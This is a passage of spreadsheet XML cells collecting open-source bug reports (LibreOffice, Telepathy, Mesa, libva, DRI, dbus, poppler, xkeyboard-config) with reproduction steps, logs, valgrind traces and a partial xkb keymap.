+    if ((len == NULL) || (saddr == NULL))
         return -1
     *addr = NetaddrAddress(saddr len)
 #ifdef STREAMSCONN</t>
  </si>
  <si>
    <t>reebydobalina</t>
  </si>
  <si>
    <t>LIBREOFFICE-81945</t>
  </si>
  <si>
    <t>FILESAVE: Corrupt : Nested sdt content leading to corruption</t>
  </si>
  <si>
    <t>Created attachment 103721
The original file
Problem description: 
Steps to reproduce:
1. Open the file in Libre Office
2. Save the file in docx format
3. Open the file in MS Office Word
Current behavior:
- The file is not opening as it is corrupted.
Expected behavior:
- The file should open properly and there should not be any corruption.
Operating System: All
Version: 4.4.0.0.alpha0+ Master</t>
  </si>
  <si>
    <t>rajashri.udhoji</t>
  </si>
  <si>
    <t>TELEPATHY-46358</t>
  </si>
  <si>
    <t>In python environment list_connection_managers passes an empty list as cms.</t>
  </si>
  <si>
    <t>In tp-glib python environment calling list_connection_managers it passes to the callback cms n_cms and others. (see URL for spec).
n_cms is passed with the correct value however cms is passed as an empty list.</t>
  </si>
  <si>
    <t>kai.huuhko</t>
  </si>
  <si>
    <t>POPPLER-103050</t>
  </si>
  <si>
    <t>Fix warnings and cleanup unused defs</t>
  </si>
  <si>
    <t>Created attachment 134579
Fix warning: comparison of unsigned expression</t>
  </si>
  <si>
    <t>MESA-21235</t>
  </si>
  <si>
    <t>Wine d3d GLSL errors</t>
  </si>
  <si>
    <t>I'm trying to run the demo of the game Braid using Wine. The game runs (I can hear the menu music) but all I get is a black window and a whole lot of of error messages from Wine:
fixme:d3d_shader:print_glsl_info_log Error received from GLSL shader #2: Error: Function 'order_ps_input' prototyped but not defined.  Separate compilation units not supported.\n
fixme:d3d_shader:print_glsl_info_log Error received from GLSL shader #1: linking with uncompiled shader\n
fixme:d3d_shader:set_glsl_shader_program &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; GL_INVALID_OPERATION (0x502) from Find glsl program uniform locations @ glsl_shader.c / 3612
fixme:d3d_shader:set_glsl_shader_program &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; GL_INVALID_OPERATION (0x502) from glUseProgramObjectARB(programId) @ glsl_shader.c / 3626
fixme:d3d_shader:hardcode_local_constants &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; GL_INVALID_OPERATION (0x502) from Hardcoding local constants @ glsl_shader.c / 3441
...
This is most likely not a bug in Wine as the game is supposed to be well supported: http://appdb.winehq.org/objectManager.php?sClass=application&amp;iId=9535
The problem is the same using the i965 driver and in software mode.
The demo can be downloaded here:
http://www.playgreenhouse.com/game/NNONE-000001-01/
I'm using Mesa 7.4.</t>
  </si>
  <si>
    <t>LIBVA-40820</t>
  </si>
  <si>
    <t>Some videos show block-type artifacts (mplayer/vaapi) (sandy-bridge)</t>
  </si>
  <si>
    <t>Some but not all videos show block/square artifacts when played back using hardware acceleration (vaapi). Also in the video's that do show these artifacts they are not visible all the time and when they appear there may be only a few or many artifacts visible in a given frame. The videos appear fine when using -vo xv or -vo vaapi without -va vaapi.
Link: http://www.mediafire.com/?3s92c5znkiase22
Link is to a small sample clip (28mb 50sec hd-ready anime). This clip demonstrates the three 'types' of artifacts described above. 
In the first few seconds of the clip the video appears normal.
Then there is a flashback which starts out normal too but after a scene change there appear heavy blocking artifacts. It is hard to tell if only the color of the blocks if off or if (some of) the actual contents are wrong too. I'm inclined to say the former is the case (only the color is off).
After the flashback returns to the present time there is some mild blocking (especially evident when the woman turns her her head).
Hardware is Dell XPS 15 (L502x) with:
00:02.0 VGA compatible controller: Intel Corporation Device 0116 (rev 09)
[    13.803] (II) intel(0): Integrated Graphics Chipset: Intel(R) Sandybridge
Mobile (GT2)
Software versions:
mplayer: http://www.splitted-desktop.com/~gbeauchesne/mplayer-vaapi/mplayer-vaapi-20110127.tar.bz2
libva: fde78c4488dd65430c9452fba4ca04d9b8f94c18
xf86-video-intel: 04c5a3df02f6f40a904ff4edb927ae6ff0ce6408
mesa: 2154c672b3f2a0f3de7aaacd9260954b9310262a
kernel: 3.0.0 (vanilla)</t>
  </si>
  <si>
    <t>TELEPATHY-31510</t>
  </si>
  <si>
    <t>telepathy-logger-0.1.5-1.fc14: raise: Process /usr/libexec/telepathy-logger was killed by signal 6</t>
  </si>
  <si>
    <t>Created attachment 40161
Backtrace
abrt version: 1.1.13
architecture: x86_64
Attached file: backtrace
cmdline: /usr/libexec/telepathy-logger
component: telepathy-logger
crash_function: raise
executable: /usr/libexec/telepathy-logger
kernel: 2.6.35.6-48.fc14.x86_64
package: telepathy-logger-0.1.5-1.fc14
rating: 4
reason: Process /usr/libexec/telepathy-logger was killed by signal 6 (SIGABRT)
release: Fedora release 14 (Laughlin)
time: 1289330422
uid: 500
How to reproduce
-----
1.testing the latest empathy I have connected to my regular account and then
terminated immediately when I got connected.
Original Bug: https://bugzilla.redhat.com/show_bug.cgi?id=651543</t>
  </si>
  <si>
    <t>LIBREOFFICE-79968</t>
  </si>
  <si>
    <t>FILESAVE: DOCX embedded with PowerPoint object is not preserved after RT</t>
  </si>
  <si>
    <t>Created attachment 100951
Document contains Powerpoint Slide embedded
Problem description: 
Steps to reproduce:
1. Open the document in LibreOffice.
2. Save as .docx
3. Open in MS Office 2010.
Current behavior:
Powerpoint slide embedded in DOCX is not preserved after RT.
Expected behavior:
Powerpoint slide embedded in DOCX is preserved after RT.
Operating System: All
Version: 4.4.0.0.alpha0+ Master</t>
  </si>
  <si>
    <t>MESA-106151</t>
  </si>
  <si>
    <t>[amdgpu][vulkan] GPU hang (Vega 56) while running game (Rise of the Tomb Raider)</t>
  </si>
  <si>
    <t>The hang happens very quickly after playing for about 30 seconds.
Distrib : Debian GNU/Linux testing (buster)
linux : tag v4.16 (0adb32858b0bddf4ada5f364a84ed60b196dbcda)
mesa : 18.1.0-devel (24fb3e6aa166b3afe906eb2845077766075189ed)
clang/llvm : 7.0.0 (c33e1469f018cf71327e06df054a0ffc87f4d9f8/2f0f603361d156e655216b46f95d1136934daba2)
Syslog :
Apr 20 16:10:33 galaxie kernel: [  725.999915] INFO: task kworker/u32:5:165 blocked for more than 120 seconds.
Apr 20 16:10:33 galaxie kernel: [  725.999924]       Not tainted 4.16.0 #4
Apr 20 16:10:33 galaxie kernel: [  725.999927] echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs disables this message.
Apr 20 16:10:33 galaxie kernel: [  725.999931] kworker/u32:5   D    0   165      2 0x80000000
Apr 20 16:10:33 galaxie kernel: [  725.999952] Workqueue: events_unbound commit_work [drm_kms_helper]
Apr 20 16:10:33 galaxie kernel: [  725.999955] Call Trace:
Apr 20 16:10:33 galaxie kernel: [  725.999965]  ? __schedule+0x297/0x870
Apr 20 16:10:33 galaxie kernel: [  725.999969]  schedule+0x28/0x80
Apr 20 16:10:33 galaxie kernel: [  725.999973]  schedule_timeout+0x1ee/0x380
Apr 20 16:10:33 galaxie kernel: [  726.000061]  ? dce120_timing_generator_get_crtc_position+0x5d/0x70 [amdgpu]
Apr 20 16:10:33 galaxie kernel: [  726.000139]  ? dce120_timing_generator_get_crtc_scanoutpos+0x71/0xb0 [amdgpu]
Apr 20 16:10:33 galaxie kernel: [  726.000144]  dma_fence_default_wait+0x1fd/0x280
Apr 20 16:10:33 galaxie kernel: [  726.000148]  ? dma_fence_release+0x90/0x90
Apr 20 16:10:33 galaxie kernel: [  726.000151]  dma_fence_wait_timeout+0x39/0xf0
Apr 20 16:10:33 galaxie kernel: [  726.000155]  reservation_object_wait_timeout_rcu+0x17b/0x370
Apr 20 16:10:33 galaxie kernel: [  726.000233]  amdgpu_dm_do_flip+0x112/0x350 [amdgpu]
Apr 20 16:10:33 galaxie kernel: [  726.000312]  amdgpu_dm_atomic_commit_tail+0xb54/0xdb0 [amdgpu]
Apr 20 16:10:33 galaxie kernel: [  726.000318]  ? wait_for_completion_timeout+0x3b/0x1a0
Apr 20 16:10:33 galaxie kernel: [  726.000323]  ? __switch_to+0x3ff/0x450
Apr 20 16:10:33 galaxie kernel: [  726.000326]  ? __switch_to+0x3ff/0x450
Apr 20 16:10:33 galaxie kernel: [  726.000339]  commit_tail+0x3d/0x70 [drm_kms_helper]
Apr 20 16:10:33 galaxie kernel: [  726.000344]  process_one_work+0x17b/0x360
Apr 20 16:10:33 galaxie kernel: [  726.000348]  worker_thread+0x2e/0x390
Apr 20 16:10:33 galaxie kernel: [  726.000352]  ? process_one_work+0x360/0x360
Apr 20 16:10:33 galaxie kernel: [  726.000356]  kthread+0x113/0x130
Apr 20 16:10:33 galaxie kernel: [  726.000359]  ? kthread_create_worker_on_cpu+0x70/0x70
Apr 20 16:10:33 galaxie kernel: [  726.000362]  ret_from_fork+0x35/0x40</t>
  </si>
  <si>
    <t>martin.fretigne</t>
  </si>
  <si>
    <t>DRI-93014</t>
  </si>
  <si>
    <t>[ALL] igt/kms_atomic test fail</t>
  </si>
  <si>
    <t>Created attachment 119940
dmesg
Test fail on BSW ehith the last setup:
Hardware:
Platform: Braswell M 
CPU : Intel(R) Celeron N3060 1.60GHz @ 1.6 GHz (family: 6 model: 76 stepping: 4)
SoC : BSW C0
QDF : K6XC
CRB : BRASWELL RVP Fab2
Mandatory Reworks : All Feature Reworks: F28 F32 F33 F35 F37
Optional reworks : O-01a O-02 O-03 
Software:
Linux distribution: Ubuntu 15.04 LTS 64 bits 
BIOS : BRAS.X64.B084.R00.1508310642
TXE FW : 2.0.0.2073
Ksc : 1.08
kernel  drm-intel-nightly: 2015y-11m-12d-15h-35m-53s UTC integration manifest
commit 4c2531304c0a2f36f6b2cce2add5b5b2bd3fd893
Author: Jani Nikula 
Date:   Thu Nov 12 17:36:12 2015 +0200
cairo: (HEAD tag: 1.14.2) 93422b3cb5e0ef8104b8194c8873124ce2f5ea2d from git://git.freedesktop.org/git/cairo
drm: (HEAD tag: libdrm-2.4.65 tag: 2.4.65) c3496167637e35cf8a52d5e7e53a412e79d80db0 from git://git.freedesktop.org/git/mesa/drm
intel-driver: (HEAD tag: 1.6.1 origin/v1.6-branch) 35858c69166b845c59ca32e19a3dbb0b758df209 from git://git.freedesktop.org/git/vaapi/intel-driver
libva: (HEAD tag: libva-1.6.1 origin/v1.6-branch) 613eb962b45fbbd1526d751e88e0d8897af6c0e0 from git://git.freedesktop.org/git/vaapi/libva
mesa: (HEAD tag: mesa-11.0.5) ee57c22141c42d9b511a7dfa5971c4428cd1c6e7 from git://git.freedesktop.org/git/mesa/mesa
xf86-video-intel: (HEAD tag: 2.99.917) baec802b21387d04aebb10ac29e719a1800c5aa0 from git://git.freedesktop.org/git/xorg/driver/xf86-video-intel
xserver: (HEAD tag: xorg-server-1.17.2) 2123f7682d522619f101b05fb75efa75dabbe371 from git://git.freedesktop.org/git/xorg/xserver
* Tools *
intel-gpu-tools: (HEAD origin/master origin/HEAD master) e42936d86b52c6804da41755df7155cafded5eb2 from git://git.freedesktop.org/git/xorg/app/intel-gpu-tools
Steps:
=======
./kms_atomic
Actual result:
==============
IGT-Version: 1.12-ge42936d (x86_64) (Linux: 4.3.0-nightly+ x86_64)
Test assertion failure function atomic_setup file kms_atomic.c:726:
Failed assertion: (drmSetClientCap(desc-&gt;fd 3 1)) == 0
Last errno: 22 Invalid argument
Stack trace:
  #0 [__igt_fail_assert+0x101]
  #1 [__real_main1307+0x1db0]
  #2 [main+0x23]
  #3 [__libc_start_main+0xf0]
  #4 [_start+0x29]
  #5 [+0x29]
Test kms_atomic failed.
**** DEBUG ****
(kms_atomic:1035) drmtest-DEBUG: Test requirement passed: fd &gt;= 0
Test requirement passed: fd &gt;= 0
Test requirement passed: drmSetMaster(fd) == 0
Test assertion failure function atomic_setup file kms_atomic.c:726:
Failed assertion: (drmSetClientCap(desc-&gt;fd 3 1)) == 0
Last errno: 22 Invalid argument
****  END  ****
Subtest plane_overlay_legacy: FAIL
Subtest plane_primary_legacy: FAIL
Subtest plane_cursor_legacy: FAIL
Subtest plane_invalid_params: FAIL
Subtest crtc_invalid_params: FAIL
Subtest atomic_invalid_params: FAIL</t>
  </si>
  <si>
    <t>ramix.ben.hassine</t>
  </si>
  <si>
    <t>TELEPATHY-27131</t>
  </si>
  <si>
    <t>crashes when connecting from 2 machines on the same jabber</t>
  </si>
  <si>
    <t xml:space="preserve">Using lucid and telepathy-gablle 0.8.11 when connecting with empathy from 2 machines telepathy-gabble crashes
valgrind log shows
==19046== Invalid read of size 4
==19046==    at 0x807EDBE: gabble_private_tubes_factory_free_feat (private-tubes-factory.c:655)
==19046==    by 0x434EBA7: g_hash_table_remove_all_nodes (ghash.c:488)
==19046==    by 0x434F0DC: g_hash_table_remove_all (ghash.c:1166)
==19046==    by 0x434F18C: g_hash_table_destroy (ghash.c:873)
==19046==    by 0x807FA83: gabble_private_tubes_factory_free_caps (private-tubes-factory.c:715)
==19046==    by 0x80AFD7F: gabble_caps_channel_manager_free_capabilities (caps-channel-manager.c:122)
==19046==    by 0x807C184: free_caps_helper (presence-cache.c:866)
==19046==    by 0x434E25B: g_hash_table_foreach (ghash.c:1325)
==19046==    by 0x807BCB7: gabble_presence_cache_free_cache_entry (presence-cache.c:876)
==19046==    by 0x807AFDC: gabble_presence_set_capabilities (presence.c:266)
==19046==    by 0x807E39C: gabble_presence_cache_lm_message_cb (presence-cache.c:1366)
==19046==    by 0x40BFF7F: _lm_message_handler_handle_message (lm-message-handler.c:47)
==19046==    by 0x40BDED7: connection_message_queue_cb (lm-connection.c:291)
==19046==    by 0x40C0B7E: message_queue_dispatch_func (lm-message-queue.c:100)
==19046==    by 0x435D394: g_main_context_dispatch (gmain.c:1960)
==19046==    by 0x4361087: g_main_context_iterate (gmain.c:2591)
==19046==    by 0x43615C6: g_main_loop_run (gmain.c:2799)
==19046==    by 0x41A899E: tp_run_connection_manager (in /usr/lib/libtelepathy-glib.so.0.32.1)
==19046==    by 0x8057343: gabble_main (gabble.c:161)
==19046==    by 0x805726F: main (main.c:28)
==19046==  Address 0x5c8463c is 4 bytes inside a block of size 12 free'd
==19046==    at 0x4024B3A: free (vg_replace_malloc.c:366)
==19046==    by 0x4365DB5: g_free (gmem.c:191)
==19046==    by 0x807EDD4: gabble_private_tubes_factory_free_feat (private-tubes-factory.c:658)
==19046==    by 0x434EBA7: g_hash_table_remove_all_nodes (ghash.c:488)
==19046==    by 0x434F0DC: g_hash_table_remove_all (ghash.c:1166)
==19046==    by 0x434F18C: g_hash_table_destroy (ghash.c:873)
==19046==    by 0x807FA83: gabble_private_tubes_factory_free_caps (private-tubes-factory.c:715)
==19046==    by 0x80AFD7F: gabble_caps_channel_manager_free_capabilities (caps-channel-manager.c:122)
==19046==    by 0x807C184: free_caps_helper (presence-cache.c:866)
==19046==    by 0x434E25B: g_hash_table_foreach (ghash.c:1325)
==19046==    by 0x807BCB7: gabble_presence_cache_free_cache_entry (presence-cache.c:876)
==19046==    by 0x807AE6D: gabble_presence_set_capabilities (presence.c:224)
==19046==    by 0x807E39C: gabble_presence_cache_lm_message_cb (presence-cache.c:1366)
==19046==    by 0x40BFF7F: _lm_message_handler_handle_message (lm-message-handler.c:47)
==19046==    by 0x40BDED7: connection_message_queue_cb (lm-connection.c:291)
==19046==    by 0x40C0B7E: message_queue_dispatch_func (lm-message-queue.c:100)
==19046==    by 0x435D394: g_main_context_dispatch (gmain.c:1960)
==19046==    by 0x4361087: g_main_context_iterate (gmain.c:2591)
==19046==    by 0x43615C6: g_main_loop_run (gmain.c:2799)
==19046==    by 0x41A899E: tp_run_connection_manager (in /usr/lib/libtelepathy-glib.so.0.32.1)
==19046==    by 0x8057343: gabble_main (gabble.c:161)
==19046==    by 0x805726F: main (main.c:28)
==19046== 
==19046== Invalid free() / delete / delete[]
==19046==    at 0x4024B3A: free (vg_replace_malloc.c:366)
==19046==    by 0x4365DB5: g_free (gmem.c:191)
==19046==    by 0x807EDCC: gabble_private_tubes_factory_free_feat (private-tubes-factory.c:656)
==19046==    by 0x434EBA7: g_hash_table_remove_all_nodes (ghash.c:488)
==19046==    by 0x434F0DC: g_hash_table_remove_all (ghash.c:1166)
==19046==    by 0x434F18C: g_hash_table_destroy (ghash.c:873)
==19046==    by 0x807FA83: gabble_private_tubes_factory_free_caps (private-tubes-factory.c:715)
==19046==    by 0x80AFD7F: gabble_caps_channel_manager_free_capabilities (caps-channel-manager.c:122)
==19046==    by 0x807C184: free_caps_helper (presence-cache.c:866)
==19046==    by 0x434E25B: g_hash_table_foreach (ghash.c:1325)
==19046==    by 0x807BCB7: gabble_presence_cache_free_cache_entry (presence-cache.c:876)
==19046==    by 0x807AFDC: gabble_presence_set_capabilities (presence.c:266)
==19046==    by 0x807E39C: gabble_presence_cache_lm_message_cb (presence-cache.c:1366)
==19046==    by 0x40BFF7F: _lm_message_handler_handle_message (lm-message-handler.c:47)
==19046==    by 0x40BDED7: connection_message_queue_cb (lm-connection.c:291)
==19046==    by 0x40C0B7E: message_queue_dispatch_func (lm-message-queue.c:100)
==19046==    by 0x435D394: g_main_context_dispatch (gmain.c:1960)
==19046==    by 0x4361087: g_main_context_iterate (gmain.c:2591)
==19046==    by 0x43615C6: g_main_loop_run (gmain.c:2799)
==19046==    by 0x41A899E: tp_run_connection_manager (in /usr/lib/libtelepathy-glib.so.0.32.1)
==19046==    by 0x8057343: gabble_main (gabble.c:161)
==19046==    by 0x805726F: main (main.c:28)
==19046==  Address 0x5c84800 is 0 bytes inside a block of size 55 free'd
==19046==    at 0x4024B3A: free (vg_replace_malloc.c:366)
==19046==    by 0x4365DB5: g_free (gmem.c:191)
==19046==    by 0x807EDCC: gabble_private_tubes_factory_free_feat (private-tubes-factory.c:656)
==19046==    by 0x434EBA7: g_hash_table_remove_all_nodes (ghash.c:488)
==19046==    by 0x434F0DC: g_hash_table_remove_all (ghash.c:1166)
==19046==    by 0x434F18C: g_hash_table_destroy (ghash.c:873)
==19046==    by 0x807FA83: gabble_private_tubes_factory_free_caps (private-tubes-factory.c:715)
==19046==    by 0x80AFD7F: gabble_caps_channel_manager_free_capabilities (caps-channel-manager.c:122)
==19046==    by 0x807C184: free_caps_helper (presence-cache.c:866)
==19046==    by 0x434E25B: g_hash_table_foreach (ghash.c:1325)
==19046==    by 0x807BCB7: gabble_presence_cache_free_cache_entry (presence-cache.c:876)
==19046==    by 0x807AE6D: gabble_presence_set_capabilities (presence.c:224)
==19046==    by 0x807E39C: gabble_presence_cache_lm_message_cb (presence-cache.c:1366)
==19046==    by 0x40BFF7F: _lm_message_handler_handle_message (lm-message-handler.c:47)
==19046==    by 0x40BDED7: connection_message_queue_cb (lm-connection.c:291)
==19046==    by 0x40C0B7E: message_queue_dispatch_func (lm-message-queue.c:100)
==19046==    by 0x435D394: g_main_context_dispatch (gmain.c:1960)
==19046==    by 0x4361087: g_main_context_iterate (gmain.c:2591)
==19046==    by 0x43615C6: g_main_loop_run (gmain.c:2799)
==19046==    by 0x41A899E: tp_run_connection_manager (in /usr/lib/libtelepathy-glib.so.0.32.1)
==19046==    by 0x8057343: gabble_main (gabble.c:161)
==19046==    by 0x805726F: main (main.c:28)
==19046== 
==19046== Invalid free() / delete / delete[]
==19046==    at 0x4024B3A: free (vg_replace_malloc.c:366)
==19046==    by 0x4365DB5: g_free (gmem.c:191)
==19046==    by 0x807EDD4: gabble_private_tubes_factory_free_feat (private-tubes-factory.c:658)
==19046==    by 0x434EBA7: g_hash_table_remove_all_nodes (ghash.c:488)
==19046==    by 0x434F0DC: g_hash_table_remove_all (ghash.c:1166)
==19046==    by 0x434F18C: g_hash_table_destroy (ghash.c:873)
==19046==    by 0x807FA83: gabble_private_tubes_factory_free_caps (private-tubes-factory.c:715)
==19046==    by 0x80AFD7F: gabble_caps_channel_manager_free_capabilities (caps-channel-manager.c:122)
==19046==    by 0x807C184: free_caps_helper (presence-cache.c:866)
==19046==    by 0x434E25B: g_hash_table_foreach (ghash.c:1325)
==19046==    by 0x807BCB7: gabble_presence_cache_free_cache_entry (presence-cache.c:876)
==19046==    by 0x807AFDC: gabble_presence_set_capabilities (presence.c:266)
==19046==    by 0x807E39C: gabble_presence_cache_lm_message_cb (presence-cache.c:1366)
==19046==    by 0x40BFF7F: _lm_message_handler_handle_message (lm-message-handler.c:47)
==19046==    by 0x40BDED7: connection_message_queue_cb (lm-connection.c:291)
==19046==    by 0x40C0B7E: message_queue_dispatch_func (lm-message-queue.c:100)
==19046==    by 0x435D394: g_main_context_dispatch (gmain.c:1960)
==19046==    by 0x4361087: g_main_context_iterate (gmain.c:2591)
==19046==    by 0x43615C6: g_main_loop_run (gmain.c:2799)
==19046==    by 0x41A899E: tp_run_connection_manager (in /usr/lib/libtelepathy-glib.so.0.32.1)
==19046==    by 0x8057343: gabble_main (gabble.c:161)
==19046==    by 0x805726F: main (main.c:28)
==19046==  Address 0x5c84638 is 0 bytes inside a block of size 12 free'd
==19046==    at 0x4024B3A: free (vg_replace_malloc.c:366)
==19046==    by 0x4365DB5: g_free (gmem.c:191)
==19046==    by 0x807EDD4: gabble_private_tubes_factory_free_feat (private-tubes-factory.c:658)
==19046==    by 0x434EBA7: g_hash_table_remove_all_nodes (ghash.c:488)
==19046==    by 0x434F0DC: g_hash_table_remove_all (ghash.c:1166)
==19046==    by 0x434F18C: g_hash_table_destroy (ghash.c:873)
==19046==    by 0x807FA83: gabble_private_tubes_factory_free_caps (private-tubes-factory.c:715)
==19046==    by 0x80AFD7F: gabble_caps_channel_manager_free_capabilities (caps-channel-manager.c:122)
==19046==    by 0x807C184: free_caps_helper (presence-cache.c:866)
==19046==    by 0x434E25B: g_hash_table_foreach (ghash.c:1325)
==19046==    by 0x807BCB7: gabble_presence_cache_free_cache_entry (presence-cache.c:876)
==19046==    by 0x807AE6D: gabble_presence_set_capabilities (presence.c:224)
==19046==    by 0x807E39C: gabble_presence_cache_lm_message_cb (presence-cache.c:1366)
==19046==    by 0x40BFF7F: _lm_message_handler_handle_message (lm-message-handler.c:47)
==19046==    by 0x40BDED7: connection_message_queue_cb (lm-connection.c:291)
==19046==    by 0x40C0B7E: message_queue_dispatch_func (lm-message-queue.c:100)
==19046==    by 0x435D394: g_main_context_dispatch (gmain.c:1960)
==19046==    by 0x4361087: g_main_context_iterate (gmain.c:2591)
==19046==    by 0x43615C6: g_main_loop_run (gmain.c:2799)
==19046==    by 0x41A899E: tp_run_connection_manager (in /usr/lib/libtelepathy-glib.so.0.32.1)
==19046==    by 0x8057343: gabble_main (gabble.c:161)
==19046==    by 0x805726F: main (main.c:28)
==19046== 
</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-9865</t>
  </si>
  <si>
    <t>Update french macintosh symbols map</t>
  </si>
  <si>
    <t>Hi all
xkb update fixed a lot of things for macintosh users and french one especially. However the symbols map is still very incomplete compared to PC105 one or Mac OS X one. It lakes about 20 symbols (â„¢â€¦â‰¤â‰¥â€œâ€â€˜â€™â€ â€¡Ï€Î Î´Î”â™¦âˆ«âˆžÃ·â‰  etc.).
I wrote an updated symbols map for the old xkb (0.8). I updated this file for xkb 0.9. It works nice on MacBook iBook G4 iMac G3 and iMac G5. I haven't tested on other devices but get happy feedback from ppc users without knowing which box they were running. Also this is just an update of the current symbols map not another from scratch symbols map. So it don't change the default behaviour just complete it !
Please consider include it.
Thanks
Ã‰tienne.</t>
  </si>
  <si>
    <t>bersace03</t>
  </si>
  <si>
    <t>TELEPATHY-27145</t>
  </si>
  <si>
    <t>Test that presence without caps doesn't remove caps</t>
  </si>
  <si>
    <t>I was looking at the caps code with a view to reducing the debug spam and was suddenly suspicious that the corner case where the server removes repeated  nodes from  stanzas was mishandled. Turns out it's handled correctly albeit almost by accident this patch adds a test and an explanation of the point at which it works.</t>
  </si>
  <si>
    <t>TELEPATHY-70458</t>
  </si>
  <si>
    <t>connectivity monitor depends on now-removed upower API</t>
  </si>
  <si>
    <t>See http://cgit.freedesktop.org/upower/commit/?id=030e2c9d3633e35e8beeecc1f41f6e0ff77b57dc</t>
  </si>
  <si>
    <t>DBUS-3282</t>
  </si>
  <si>
    <t>compiling dbus on slackware 10.1</t>
  </si>
  <si>
    <t>I cant compile dbus on slackware 10.1 
I am trying to compile it as it is a dependency for skype 
this is what I get when I try to compile dbus-0.33
DBUS_TOP_BUILDDIR=.. ./run-with-tmp-session-bus.sh ./print-introspect
org.freedesktop.DBus /org/freedesktop/DBus &gt; dbus-bus-introspect.xml.tmp &amp;&amp; mv
dbus-bus-introspect.xml.tmp dbus-bus-introspect.xml
escaped service dir is: ..\/test\/data\/valid-service-files
Created configuration file ./run-with-tmp-session-bus.conf
Running ../tools/dbus-launch --sh-syntax
--config-file=./run-with-tmp-session-bus.conf
Started bus pid 17934 at
unix:abstract=/tmp/dbus-u0uxEWNHZEguid=f2c883426ec604e83efd793c51236900
Running ./print-introspect org.freedesktop.DBus /org/freedesktop/DBus
./run-with-tmp-session-bus.sh: line 58: kill: (17934) - No such process
killing message bus 17934
./run-with-tmp-session-bus.sh: line 11: kill: (17934) - No such process
./run-with-tmp-session-bus.sh: Message bus vanished! should not have happened
make[2]: *** [dbus-bus-introspect.xml] Error 1
make[2]: Leaving directory `/home/slacker/dbus/dbus-0.33/tools'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/slacker/dbus/dbus-0.33'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>shane</t>
  </si>
  <si>
    <t>POPPLER-55977</t>
  </si>
  <si>
    <t>handling of rtl text inversion is too naive</t>
  </si>
  <si>
    <t>Created attachment 68555
the patch itself made on poppler 0.20.3. please give it a try.
textpage::dumpfragment makes an attempt to reorder text in it's original directionality. i mean reorder visual to logical order.
however this is generally a very heavy issue to implement handled (to my knowledge of foss) only in icu. 
fribidi does only reorder logical text to visual which may also help here but it's not the real thing.
here is a patch to implement the icu algorithm with a fribidi fallback in poppler.
i did it since the current attempt is not quite correct. a test file to test with pdftotext will be attached too.
please feel free to comment an enjoy.
best regards
alex</t>
  </si>
  <si>
    <t>alexbodn.groups</t>
  </si>
  <si>
    <t>DRI-48491</t>
  </si>
  <si>
    <t>screen isn't blank for the DPMS standby and suspend state with external VGA</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Kernel: (drm-intel-next-queued)9c33f85cf3cc3f8717e56d42fd678573ed1727d3
Libdrm:         (master)2.4.33-7-g2f1e2101b4dc0a6dc1c1d1c59c5cc5fbc54b90cf
Mesa:           (master)c6532875493ffe7de9c37924c70ebf6d0472e23d
Xserver:        (master)xorg-server-1.12.0-56-g10cd6fdc431d2d0835c313b2f5bdda6dcea281fd
Xf86_video_intel:(master)2.18.0-185-g0464e93a088a9e8bc29ad8b36b6e12c3dda32ec6
Bug reproduced steps: 
1. start X
2. run the command:xset dpms force standby/suspend
on IVB and SNB screen isn't blank for the DPMS standby and suspend state with VGA. for HDMI eDP and LVDS this issue don't occur but the DPMS off state works well.</t>
  </si>
  <si>
    <t>ouping.zhang</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-11686</t>
  </si>
  <si>
    <t>Logitech Cordless Desktop EX110</t>
  </si>
  <si>
    <t>Ok where to begin... I have the listed model:EX110 USB/PS2 keyboard/mouse combo.
It didn't do much except for the required keys except in windows. It has extra keys that the net is full of howto's some worked for me some didn't. To cut to the chase I have mine working now after way too much work on the subject. I am going to post a working set of setkeycodes=xxxx and keycode=xxx for this model.
I am sorry for this but I am using X 6.9 of a livecd installed to the hard disk.
Serge I did see the announcement you made for xkeyboard-config 1.0.
http://lists.freedesktop.org/archives/xorg/2007-July/026318.html and I have downloaded it to compare inet files with. I see some updated keyboards in there.
This EX110 is a bargain basement keyb I picked up in a pinch but I like it more  than my M$ Bluetooth garbage. 
It has from the left side to the top going across to the right in this order:
(gray) Back Close then on the top:
4 Media player keys on the left side...
(gray) Play/Pause toggle Stop Previous Next.
Then going to the middle right side 6 more keys:
(gray) Audio Mute Vol- Vol+ Email Home Calculator
The 12 Function Keys...
Next it also has a Function Key mode button which does what a lot of other Logitech models do... gives the 12 function keys a new lease on life by sending yet new codes the kernel knows nothing about even when plugged in to the PS2 port. (On USB the 12 function keys were just not ever seen by the kernel.) 
I had to set the kernel message level to 8 before it would report in the syslog that keys were there but it didn't know what they were. Ctrl-Alt-SysReq then Ctrl-Alt-8. I put this here for the benefit of those who have a Linux put together by someone who thinks like my distro did and sets the loglevel too low for these messages to be recorded in the syslog.
They have pictures on them but they almost all map to some XFree86 symbolic name. There is no XF86Undo or XF86Redo defined in my XKeysymDB or something Close to Powerpoint so I used XF86Pictures in mine.
I defined a model in the needed files in /usr/X11/lib/X11/xkb/rules/ as logiex110. I have 12 new keys that I can assign to alot of things in KDE but not anything like Cut Copy Paste which KDE seems to want a combo keystroke for.
Possibly I can get better results using different setkeycodes commands.
For now I am just enjoying alot of new keys to assign functions to.
I used the Logitech Cordless Desktop as a starting point but it did the wrong thing for some buttons and there were some it had no mapping for. Home and Close I remember for sure. The F9~F12 keys are just labeled ABCD so I gave them Launch labels.
I know there are ways to include sections of keys Logitech definitions but what I don't know is if I use an include directive and then specify a new label for a key already defined then which one will win?
Is there an overrides directive in the compiler's building of the tables?
// Logitech Cordless Desktop EX110
partial alphanumeric_keys
xkb_symbols logiex110 {
    key 	{	[ XF86Back		]	}      // Back
    key    {       [ XF86Close             ]       }      // Close
    key 	{	[ XF86AudioPlay XF86AudioPause ] }
    key 	{	[ XF86AudioStop		]	}
    key 	{	[ XF86AudioPrev		]	}
    key 	{	[ XF86AudioNext		]	}
    key 	{	[ XF86AudioMute		]	}
    key 	{	[ XF86AudioLowerVolume	]	}
    key 	{	[ XF86AudioRaiseVolume	]	}
